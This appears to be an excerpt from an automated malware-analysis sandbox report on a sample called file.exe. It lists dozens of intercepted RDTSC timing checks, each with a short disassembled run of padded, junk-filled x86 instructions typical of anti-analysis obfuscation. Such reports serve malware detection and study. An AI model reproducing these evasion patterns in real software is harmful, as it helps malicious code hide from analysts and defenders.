          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360210 second address: 5360220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4F296427ACh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360220 second address: 5360224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360224 second address: 5360257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F4F296427ACh 0x0000000e mov dword ptr [esp], edi 0x00000011 jmp 00007F4F296427B0h 0x00000016 mov eax, dword ptr [75AB4538h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360257 second address: 536025B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536025B second address: 5360261 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360261 second address: 53602C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c pushad 0x0000000d mov dh, al 0x0000000f pushfd 0x00000010 jmp 00007F4F28CDCB73h 0x00000015 sbb esi, 03940E1Eh 0x0000001b jmp 00007F4F28CDCB79h 0x00000020 popfd 0x00000021 popad 0x00000022 xor eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F4F28CDCB6Ah 0x0000002b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53602C2 second address: 53602F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F4F296427B6h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007F4F296427ACh 0x00000017 pop eax 0x00000018 movsx edx, ax 0x0000001b popad 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53602F6 second address: 536034A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F4F28CDCB6Eh 0x0000000f lea eax, dword ptr [ebp-10h] 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F4F28CDCB6Eh 0x00000019 and esi, 4F2C1338h 0x0000001f jmp 00007F4F28CDCB6Bh 0x00000024 popfd 0x00000025 mov edi, eax 0x00000027 popad 0x00000028 mov dword ptr fs:[00000000h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536034A second address: 536034E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536034E second address: 5360354 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360354 second address: 53603A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-18h], esp 0x0000000c pushad 0x0000000d mov ecx, 015F629Dh 0x00000012 mov dx, si 0x00000015 popad 0x00000016 mov eax, dword ptr fs:[00000018h] 0x0000001c jmp 00007F4F296427B4h 0x00000021 mov ecx, dword ptr [eax+00000FDCh] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53603A1 second address: 53603A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53603A5 second address: 53603C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53603C2 second address: 53603FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, ecx 0x0000000b pushad 0x0000000c mov dx, cx 0x0000000f mov eax, 64FB4CEFh 0x00000014 popad 0x00000015 jns 00007F4F28CDCBAEh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4F28CDCB71h 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53603FC second address: 5360402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360402 second address: 5360406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360406 second address: 5360428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add eax, ecx 0x0000000a pushad 0x0000000b call 00007F4F296427B5h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350221 second address: 5350227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350227 second address: 5350240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4F296427B5h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350240 second address: 5350251 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b mov di, BA2Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350251 second address: 535028D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4F296427ABh 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d jmp 00007F4F296427B6h 0x00000012 sub esp, 2Ch 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 call 00007F4F296427ACh 0x0000001d pop ecx 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535028D second address: 53502C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushfd 0x00000006 jmp 00007F4F28CDCB6Dh 0x0000000b and cl, 00000016h 0x0000000e jmp 00007F4F28CDCB71h 0x00000013 popfd 0x00000014 pop esi 0x00000015 popad 0x00000016 push esp 0x00000017 pushad 0x00000018 mov bh, D7h 0x0000001a popad 0x0000001b mov dword ptr [esp], ebx 0x0000001e pushad 0x0000001f mov di, cx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53502C5 second address: 53502D4 instructions: 0x00000000 rdtsc 0x00000002 mov si, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53502D4 second address: 53502D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53502D8 second address: 53502DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53502DC second address: 53502E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350336 second address: 5350345 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350345 second address: 53503F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007F4F28CDCB77h 0x00000010 sub edi, edi 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F4F28CDCB75h 0x00000019 sbb esi, 67199B06h 0x0000001f jmp 00007F4F28CDCB71h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007F4F28CDCB70h 0x0000002b or ax, 41A8h 0x00000030 jmp 00007F4F28CDCB6Bh 0x00000035 popfd 0x00000036 popad 0x00000037 inc ebx 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b pushfd 0x0000003c jmp 00007F4F28CDCB72h 0x00000041 sbb si, B408h 0x00000046 jmp 00007F4F28CDCB6Bh 0x0000004b popfd 0x0000004c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53503F7 second address: 535049E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4F296427B8h 0x00000008 sbb si, D668h 0x0000000d jmp 00007F4F296427ABh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F4F296427B8h 0x0000001b xor si, A8C8h 0x00000020 jmp 00007F4F296427ABh 0x00000025 popfd 0x00000026 popad 0x00000027 test al, al 0x00000029 pushad 0x0000002a push ecx 0x0000002b call 00007F4F296427ABh 0x00000030 pop esi 0x00000031 pop ebx 0x00000032 call 00007F4F296427B6h 0x00000037 pushad 0x00000038 popad 0x00000039 pop esi 0x0000003a popad 0x0000003b je 00007F4F29642950h 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F4F296427B9h 0x0000004a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535049E second address: 53504A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53504A4 second address: 53504BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4F296427B3h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53504BB second address: 53504BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350633 second address: 5350637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350637 second address: 5350682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F4F28CDCB71h 0x0000000c add cl, 00000016h 0x0000000f jmp 00007F4F28CDCB71h 0x00000014 popfd 0x00000015 popad 0x00000016 lea eax, dword ptr [ebp-2Ch] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov bh, 95h 0x0000001e jmp 00007F4F28CDCB74h 0x00000023 popad 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350682 second address: 5350688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350688 second address: 535068C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535068C second address: 53506D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov eax, edi 0x0000000e pushfd 0x0000000f jmp 00007F4F296427B7h 0x00000014 add cx, 105Eh 0x00000019 jmp 00007F4F296427B9h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53506D2 second address: 53506E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4F28CDCB6Ch 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53506E2 second address: 5350728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b jmp 00007F4F296427B7h 0x00000010 nop 0x00000011 pushad 0x00000012 mov eax, 0D52ED1Bh 0x00000017 call 00007F4F296427B0h 0x0000001c mov si, C401h 0x00000020 pop eax 0x00000021 popad 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350728 second address: 535072C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535072C second address: 5350745 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350745 second address: 53507B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push esi 0x0000000c jmp 00007F4F28CDCB73h 0x00000011 pop eax 0x00000012 mov bx, FEECh 0x00000016 popad 0x00000017 push ebx 0x00000018 pushad 0x00000019 mov esi, 62EB736Dh 0x0000001e pushfd 0x0000001f jmp 00007F4F28CDCB6Ah 0x00000024 adc si, AD08h 0x00000029 jmp 00007F4F28CDCB6Bh 0x0000002e popfd 0x0000002f popad 0x00000030 mov dword ptr [esp], ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F4F28CDCB70h 0x0000003c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53507B1 second address: 53507C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340E02 second address: 5340E7B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4F28CDCB77h 0x00000008 sub eax, 34AD5E1Eh 0x0000000e jmp 00007F4F28CDCB79h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov eax, 2FEECBE7h 0x0000001b popad 0x0000001c push eax 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F4F28CDCB73h 0x00000024 sub al, 0000002Eh 0x00000027 jmp 00007F4F28CDCB79h 0x0000002c popfd 0x0000002d push eax 0x0000002e push edx 0x0000002f mov edx, eax 0x00000031 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340E7B second address: 5340EC5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4F296427AAh 0x00000008 and cx, F5A8h 0x0000000d jmp 00007F4F296427ABh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 jmp 00007F4F296427B6h 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f popad 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F4F296427ABh 0x00000028 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340EC5 second address: 5340F1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c jmp 00007F4F28CDCB6Eh 0x00000011 mov dword ptr [ebp-04h], 55534552h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov edx, 487DFCE0h 0x00000020 call 00007F4F28CDCB79h 0x00000025 pop ecx 0x00000026 popad 0x00000027 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340F3D second address: 5340F73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4F296427B8h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340F73 second address: 5340F79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340F79 second address: 5340F7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340F7F second address: 5340F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340F83 second address: 5340F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5340F87 second address: 5350BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a and bl, 00000001h 0x0000000d movzx eax, bl 0x00000010 lea esp, dword ptr [ebp-0Ch] 0x00000013 pop esi 0x00000014 pop edi 0x00000015 pop ebx 0x00000016 pop ebp 0x00000017 ret 0x00000018 add esp, 04h 0x0000001b jmp dword ptr [00FDA41Ch+ebx*4] 0x00000022 push edi 0x00000023 call 00007F4F28D02567h 0x00000028 push ebp 0x00000029 push ebx 0x0000002a push edi 0x0000002b push esi 0x0000002c sub esp, 000001D0h 0x00000032 mov dword ptr [esp+000001B4h], 00FDCB10h 0x0000003d mov dword ptr [esp+000001B0h], 000000D0h 0x00000048 mov dword ptr [esp], 00000000h 0x0000004f mov eax, dword ptr [00FD81DCh] 0x00000054 call eax 0x00000056 mov edi, edi 0x00000058 jmp 00007F4F28CDCB70h 0x0000005d xchg eax, ebp 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 mov di, FAE0h 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350BB0 second address: 5350BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350BB5 second address: 5350BF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 pushfd 0x00000006 jmp 00007F4F28CDCB6Eh 0x0000000b and ax, 1D28h 0x00000010 jmp 00007F4F28CDCB6Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4F28CDCB74h 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350BF4 second address: 5350C3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F4F296427B4h 0x00000011 sbb al, FFFFFFE8h 0x00000014 jmp 00007F4F296427ABh 0x00000019 popfd 0x0000001a movzx esi, di 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F4F296427AEh 0x00000027 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350C3F second address: 5350CAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4F28CDCB71h 0x00000009 xor ch, FFFFFFB6h 0x0000000c jmp 00007F4F28CDCB71h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F4F28CDCB70h 0x00000018 adc esi, 7DBF69D8h 0x0000001e jmp 00007F4F28CDCB6Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 cmp dword ptr [75AB459Ch], 05h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F4F28CDCB70h 0x00000037 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350CAA second address: 5350CB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350CB0 second address: 5350D21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4F993DA8A3h 0x0000000f jmp 00007F4F28CDCB70h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F4F28CDCB6Dh 0x0000001e jmp 00007F4F28CDCB6Bh 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F4F28CDCB78h 0x0000002a adc cx, F028h 0x0000002f jmp 00007F4F28CDCB6Bh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350D68 second address: 5350D6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350D6C second address: 5350D72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350D72 second address: 5350D83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4F296427ADh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350D83 second address: 5350D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350D87 second address: 5350DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F4F296427A9h 0x0000000d jmp 00007F4F296427ADh 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4F296427ACh 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350DB4 second address: 5350E00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F4F28CDCB79h 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 mov dx, 72A2h 0x00000019 popad 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F4F28CDCB72h 0x00000025 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350E00 second address: 5350E05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537044D second address: 5370497 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4F28CDCB78h 0x00000008 adc cl, 00000018h 0x0000000b jmp 00007F4F28CDCB6Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 push eax 0x00000018 mov esi, edi 0x0000001a pop edi 0x0000001b popad 0x0000001c xchg eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F4F28CDCB70h 0x00000026 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370497 second address: 537049B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537049B second address: 53704A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53704A1 second address: 53704A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53704A7 second address: 5370532 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4F28CDCB6Fh 0x0000000e xchg eax, esi 0x0000000f jmp 00007F4F28CDCB76h 0x00000014 mov esi, dword ptr [ebp+0Ch] 0x00000017 jmp 00007F4F28CDCB70h 0x0000001c test esi, esi 0x0000001e jmp 00007F4F28CDCB70h 0x00000023 je 00007F4F993BAA22h 0x00000029 pushad 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 mov cx, 8A4Fh 0x00000034 popad 0x00000035 cmp dword ptr [75AB459Ch], 05h 0x0000003c jmp 00007F4F28CDCB72h 0x00000041 je 00007F4F993D2AD7h 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370532 second address: 537054F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537054F second address: 5370574 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4F28CDCB6Dh 0x00000011 rdtsc
